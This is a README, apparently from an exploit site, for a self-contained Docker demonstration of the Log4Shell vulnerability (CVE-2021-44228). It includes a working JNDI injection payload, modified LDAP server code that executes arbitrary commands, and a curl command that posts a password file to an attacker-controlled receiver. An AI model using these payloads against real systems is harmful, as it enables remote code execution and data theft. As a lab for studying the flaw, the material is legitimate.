## https://sploitus.com/exploit?id=6F20D8B7-C252-5759-B02B-F8E2C9D42E38
# CVE-2021-44228-docker-example
A simple demonstration of CVE-2021-44228 to transfer data from a vulnerable server to a web service controlled by an attacker.
All components involved are running via Docker.
## Components
### vulnerable-server
This is a standard Java server acting as the victim. It's running:
- Java `8u111`
- Web Application (Spring Boot 2.6.1)
- Log4J
**This server is `VULNERABLE` using this configuration.**
Additional Information:
- endpoint at `/logging` (GET) will log the user agent using Log4J
- `/foo/passwords.txt` exists (the attackers target)
Content of `passwords.txt`:
```text
my secret
```
### malicious-receiver
This is a standard Java server acting as the data collector of the attacker. It's running:
- Java `17`
- Web Application (Spring Boot 2.6.1)
Additional information:
- endpoint at `receiver` (POST) will log the request body
### malicious-ldap
This is an LDAP server powered by [rogue-jndi](https://github.com/veracode-research/rogue-jndi).
Its `ExportJava` class has been modified so that commands passed via the `-c` flag get executed.
```java
public ExportObject() {
try {
Runtime.getRuntime().exec(Config.command);
} catch(Exception e) {
e.printStackTrace();
}
}
```
When requested by the vulnerable server it will respond with a class running the following command when instantiated:
```shell
curl -XPOST http://172.18.18.11:8082/receiver --data-binary @/foo/passwords.txt
```
This will effectively post the content of `/foo/passwords.txt` to the malicious receiver's prepared endpoint.
## Usage
1. setup Docker images by running:
```shell
./build.sh
```
2. start component containers by running:
```shell
./start.sh
```
3. trigger the vulnerability by running:
```shell
curl -A '${jndi:ldap://172.18.18.10/o=reference}' localhost:8081/logging
```
4. check the logging output of the malicious receiver component by running:
```shell
docker logs --timestamps docker_malicious-receiver_1
```
There should be the content of the server's `passwords.txt` file.
5. stop component containers by running:
```shell
./stop.sh
```